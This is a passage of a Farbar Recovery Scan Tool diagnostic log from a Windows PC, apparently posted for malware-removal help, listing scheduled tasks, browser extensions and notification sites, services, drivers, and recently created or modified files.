Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-20]
FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-20]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-20]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-20]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 e2eVAWdm; C:\WINDOWS\System32\drivers\VAud_WDM.sys [112696 2017-07-12] (ARTRAY CO., LTD. -> e2eSoft)
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) (Whitelisted) =========
(If an entry is included in the fixlist, the file/folder will be moved.)
2021-01-20 18:40 - 2021-01-20 19:43 - 000020181 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 16:58 - 2021-01-20 16:59 - 000000000 ____D C:\AdwCleaner
2021-01-20 16:57 - 2021-01-20 16:55 - 008458096 _____ (Malwarebytes) C:\Users\IRENA-PC\Desktop\adwcleaner_8.0.9.exe
2021-01-20 09:32 - 2017-07-12 23:48 - 000112696 _____ (e2eSoft) C:\WINDOWS\system32\Drivers\VAud_WDM.sys
2021-01-20 09:02 - 2021-01-20 09:03 - 000433944 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-20 08:46 - 2021-01-20 08:46 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\ProgramData\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\Program Files (x86)\Glarysoft
2021-01-20 08:16 - 2021-01-20 10:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GridinSoft Anti-Malware
2021-01-20 08:16 - 2021-01-20 08:16 - 000000000 ____D C:\ProgramData\GridinSoft
2021-01-20 07:13 - 2021-01-20 18:05 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 19:43 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 18:05 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2021-01-20 19:39 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 19:38 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-20 19:33 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-20 19:33 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-20 19:33 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-20 19:33 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-20 19:28 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-20 19:28 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-20 19:28 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-20 19:27 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-20 19:21 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-20 13:09 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-20 12:56 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-20 11:10 - 2017-03-10 18:17 - 000044146 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-20 10:02 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-20 09:46 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-20 08:48 - 2018-05-16 16:28 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Kryptex
2021-01-20 08:17 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
